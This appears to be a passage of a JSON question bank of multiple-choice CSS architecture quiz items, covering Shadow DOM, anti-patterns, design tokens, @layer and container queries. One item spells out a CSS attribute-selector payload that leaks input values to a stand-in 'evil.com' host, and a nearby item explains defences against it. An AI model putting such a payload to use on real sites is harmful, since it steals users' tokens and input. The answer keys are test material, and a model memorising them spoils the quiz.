    "explanation": "The `:host` pseudo-class targets the shadow host (the custom element like `<my-card>`) from inside its own shadow tree. You can also use `:host(.active)` to style the host based on classes applied in the light DOM."
  },
  {
    "id": 645,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Shadow DOM (::slotted)",
    "question": "What does the `::slotted()` pseudo-element target in a Shadow DOM?",
    "code_snippet": null,
    "options": ["Elements inside the shadow tree", "Elements that are passed into the Shadow DOM via `<slot>` from the light DOM", "The `<slot>` element itself", "Elements outside the component"],
    "correct_answer": "Elements that are passed into the Shadow DOM via `<slot>` from the light DOM",
    "explanation": "When a user places HTML inside your custom component (e.g., `<my-card> <h2>Title</h2> </my-card>`), the `<h2>` is in the light DOM. You can style it from inside the shadow DOM using `::slotted(h2) { color: blue; }`."
  },
  {
    "id": 646,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Shadow DOM (::part)",
    "question": "How can a developer style an internal element of a Web Component from the outside, without breaking encapsulation?",
    "code_snippet": null,
    "options": ["They cannot, Shadow DOM is completely locked", "The component author adds the `part=\"name\"` attribute to the internal element, and the outside CSS uses the `::part(name)` pseudo-element to style it", "By using `!important` on the global stylesheet", "By using JavaScript to inject a `<style>` tag"],
    "correct_answer": "The component author adds the `part=\"name\"` attribute to the internal element, and the outside CSS uses the `::part(name)` pseudo-element to style it",
    "explanation": "CSS Shadow Parts (`::part`) allow component authors to explicitly expose a 'whitelist' of internal elements for external styling, providing a safe, controlled API for theming without breaking the component's internal structure."
  },
  {
    "id": 647,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Security (Injection)",
    "question": "What is 'CSS Injection' and how can it be a security risk?",
    "code_snippet": null,
    "options": ["When CSS files fail to load", "When an attacker can inject arbitrary CSS into a page, which they can use to read sensitive data (like CSRF tokens or user input) and exfiltrate it to an external server", "When CSS causes the browser to crash", "When CSS overrides JavaScript variables"],
    "correct_answer": "When an attacker can inject arbitrary CSS into a page, which they can use to read sensitive data (like CSRF tokens or user input) and exfiltrate it to an external server",
    "explanation": "Unlike JavaScript, CSS cannot directly read cookies or DOM text. However, through clever attribute selectors and background images, CSS can be used to 'guess' and leak sensitive data character by character."
  },
  {
    "id": 648,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Data Exfiltration",
    "question": "How can an attacker use CSS to steal a user's input from a hidden `<input>` or a CSRF token?",
    "code_snippet": null,
    "options": ["By using `console.log()` in CSS", "By using attribute selectors (e.g., `input[value^='a'] { background: url('https://evil.com/?char=a'); }`) to load an external image for every possible character, logging the values on the attacker's server", "By using `alert()` in CSS", "By changing the `type` attribute to `text`"],
    "correct_answer": "By using attribute selectors (e.g., `input[value^='a'] { background: url('https://evil.com/?char=a'); }`) to load an external image for every possible character, logging the values on the attacker's server",
    "explanation": "This is a classic CSS exfiltration attack. The browser downloads the image from `evil.com` only if the input's value starts with 'a'. By repeating this for every letter and number, the attacker reconstructs the secret token in their server logs."
  },
  {
    "id": 649,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Preventing CSS Injection",
    "question": "What is the best way to prevent CSS Injection and data exfiltration attacks?",
    "code_snippet": null,
    "options": ["Disabling JavaScript", "Using a strict Content Security Policy (CSP) to block external resource loading, and properly sanitizing/escaping any user input before rendering it as CSS", "Using only inline styles", "Removing all `<input>` elements"],
    "correct_answer": "Using a strict Content Security Policy (CSP) to block external resource loading, and properly sanitizing/escaping any user input before rendering it as CSS",
    "explanation": "A strict CSP (`default-src 'self'`) prevents the browser from loading the attacker's background images, completely neutralizing the exfiltration attempt. Sanitization prevents the attacker from injecting the malicious CSS in the first place."
  },
  {
    "id": 650,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Anti-pattern (Deep Nesting)",
    "question": "Why is deep nesting in CSS preprocessors (e.g., `.a .b .c .d .e`) considered a major anti-pattern?",
    "code_snippet": null,
    "options": ["It makes the file size too small", "It creates highly specific, brittle selectors that are tightly coupled to the HTML structure, making the CSS impossible to reuse and prone to specificity wars", "It is a syntax error", "It prevents the use of variables"],
    "correct_answer": "It creates highly specific, brittle selectors that are tightly coupled to the HTML structure, making the CSS impossible to reuse and prone to specificity wars",
    "explanation": "Deep nesting generates long descendant selectors that are incredibly hard to override. If the HTML structure changes even slightly, the CSS breaks. It is always better to use flat, single-class selectors."
  },
  {
    "id": 651,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Anti-pattern (!important)",
    "question": "Why is the overuse of `!important` considered a severe architecture anti-pattern?",
    "code_snippet": null,
    "options": ["It makes the CSS file larger", "It completely breaks the natural cascade, forcing developers to use even more `!important` declarations to override styles, leading to an unmaintainable 'specificity war'", "It slows down the browser", "It is deprecated in CSS3"],
    "correct_answer": "It completely breaks the natural cascade, forcing developers to use even more `!important` declarations to override styles, leading to an unmaintainable 'specificity war'",
    "explanation": "Once you use `!important`, the only way to override it is with another `!important` and a higher specificity. This quickly turns a codebase into an unmanageable mess. Modern CSS Layers (`@layer`) solve this problem natively."
  },
  {
    "id": 652,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Anti-pattern (Over-qualifying)",
    "question": "Why is over-qualifying selectors (e.g., `div.my-class` instead of just `.my-class`) considered an anti-pattern?",
    "code_snippet": null,
    "options": ["It is invalid CSS", "It unnecessarily increases the specificity of the selector and tightly couples the CSS to a specific HTML tag, preventing the class from being reused on other elements like `<section>` or `<button>`", "It makes the text bold", "It prevents the use of Flexbox"],
    "correct_answer": "It unnecessarily increases the specificity of the selector and tightly couples the CSS to a specific HTML tag, preventing the class from being reused on other elements like `<section>` or `<button>`",
    "explanation": "Classes are meant to be semantic and reusable. If you write `ul.nav`, you can never use that `.nav` class on a `<nav>` element without overriding the `ul` styles. Just use `.nav`."
  },
  {
    "id": 653,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Anti-pattern (Magic Numbers)",
    "question": "What is a 'Magic Number' in CSS architecture?",
    "code_snippet": null,
    "options": ["A CSS variable", "A hardcoded, unexplained numeric value (like `top: 37px` or `margin-left: 13px`) that is used as a hack to fix a layout issue without understanding the underlying cause", "A special unit like `fr`", "A random color hex code"],
    "correct_answer": "A hardcoded, unexplained numeric value (like `top: 37px` or `margin-left: 13px`) that is used as a hack to fix a layout issue without understanding the underlying cause",
    "explanation": "Magic numbers are fragile. If the font size or content changes later, that '37px' hack will break. Always strive to understand the root cause of a layout issue and use relative, logical spacing instead."
  },
  {
    "id": 654,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Anti-pattern (Styling by Tag)",
    "question": "Why is styling raw HTML tags (like `h2 { color: red; }`) inside a component's CSS file considered an anti-pattern in modern architecture?",
    "code_snippet": null,
    "options": ["It is invalid CSS", "It causes 'style leakage', where the component accidentally changes the appearance of all `h2` tags on the entire page, breaking other components", "It makes the page load slower", "It prevents the use of classes"],
    "correct_answer": "It causes 'style leakage', where the component accidentally changes the appearance of all `h2` tags on the entire page, breaking other components",
    "explanation": "Components should be self-contained. If you style `h2` globally inside a component, you cannot reuse that component on a page that has its own `h2` styles without causing conflicts. Always use classes."
  },
  {
    "id": 655,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Visual Regression Testing",
    "question": "What is 'Visual Regression Testing' in the context of CSS architecture?",
    "code_snippet": null,
    "options": ["Checking if the CSS file is minified", "An automated testing method that takes screenshots of UI components before and after code changes, comparing them pixel-by-pixel to catch unintended visual bugs", "Testing if the CSS loads on mobile", "Checking for syntax errors"],
    "correct_answer": "An automated testing method that takes screenshots of UI components before and after code changes, comparing them pixel-by-pixel to catch unintended visual bugs",
    "explanation": "Tools like Chromatic or Percy integrate with CI/CD pipelines to ensure that a change to a 'Button' component doesn't accidentally break the layout of the 'Header' component elsewhere in the app."
  },
  {
    "id": 656,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Design Tokens",
    "question": "What are 'Design Tokens' in modern CSS architecture?",
    "code_snippet": null,
    "options": ["JavaScript variables", "Platform-agnostic variables (like colors, spacing, typography) that represent the foundational visual decisions of a design system, which can be compiled into CSS variables, Sass, or mobile formats", "CSS classes", "HTML attributes"],
    "correct_answer": "Platform-agnostic variables (like colors, spacing, typography) that represent the foundational visual decisions of a design system, which can be compiled into CSS variables, Sass, or mobile formats",
    "explanation": "Design Tokens are the 'atoms' of a design system. By storing them in a single JSON file, you ensure that your Web, iOS, and Android apps all use the exact same shade of blue and the exact same spacing scale."
  },
  {
    "id": 657,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Design Tokens (W3C)",
    "question": "What is the current status of Design Tokens in the web standards world?",
    "code_snippet": null,
    "options": ["They are deprecated", "The W3C has published a draft specification for Design Tokens, aiming to standardize the JSON format so that design tools (like Figma) and codebases can share the exact same source of truth seamlessly", "They are only used in React", "They are a proprietary Adobe format"],
    "correct_answer": "The W3C has published a draft specification for Design Tokens, aiming to standardize the JSON format so that design tools (like Figma) and codebases can share the exact same source of truth seamlessly",
    "explanation": "The W3C Design Tokens spec ensures that a tool like Style Dictionary can take a single JSON file and output perfectly formatted CSS variables, iOS Swift constants, and Android XML resources."
  },
  {
    "id": 658,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Layers (@layer)",
    "question": "How does the `@layer` at-rule revolutionize CSS architecture and third-party library integration?",
    "code_snippet": null,
    "options": ["It compresses the CSS", "It allows developers to define the exact order of the cascade, ensuring that a third-party library's styles can be easily overridden by the application's base styles without relying on `!important` or complex selectors", "It animates the CSS", "It scopes the CSS to the Shadow DOM"],
    "correct_answer": "It allows developers to define the exact order of the cascade, ensuring that a third-party library's styles can be easily overridden by the application's base styles without relying on `!important` or complex selectors",
    "explanation": "By wrapping a library like Bootstrap in `@layer bootstrap`, you guarantee that any standard CSS you write outside of a layer will always win, completely eliminating the nightmare of overriding heavy third-party frameworks."
  },
  {
    "id": 659,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Container Queries & Architecture",
    "question": "How do Container Queries change the way we architect CSS components?",
    "code_snippet": null,
    "options": ["They make the CSS file smaller", "They allow components to be truly modular and context-aware, meaning a component's layout is dictated by its parent container's size rather than the global viewport, eliminating the need for global media queries", "They replace Flexbox", "They disable JavaScript"],
    "correct_answer": "They allow components to be truly modular and context-aware, meaning a component's layout is dictated by its parent container's size rather than the global viewport, eliminating the need for global media queries",
    "explanation": "With Container Queries, a 'User Profile Card' component can automatically switch from a horizontal layout to a vertical layout based on whether it's placed in a wide main column or a narrow sidebar, without the developer writing a single `@media` query."
  },
  {
    "id": 660,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Final Philosophy",
    "question": "What is the ultimate philosophy of modern CSS architecture?",
    "code_snippet": null,
    "options": ["To write as much CSS as possible", "To write CSS that is predictable, scoped, and maintainable, leveraging modern browser features (like Layers, Container Queries, and Cascade) to build resilient design systems that scale effortlessly across teams", "To completely eliminate the need for classes", "To force everyone to use Sass"],
    "correct_answer": "To write CSS that is predictable, scoped, and maintainable, leveraging modern browser features (like Layers, Container Queries, and Cascade) to build resilient design systems that scale effortlessly across teams",
    "explanation": "The days of massive, fragile, global stylesheets are over. Modern CSS architecture is about embracing the platform, scoping components, defining clear design tokens, and letting the browser's native cascade work for you, not against you."
  }
]
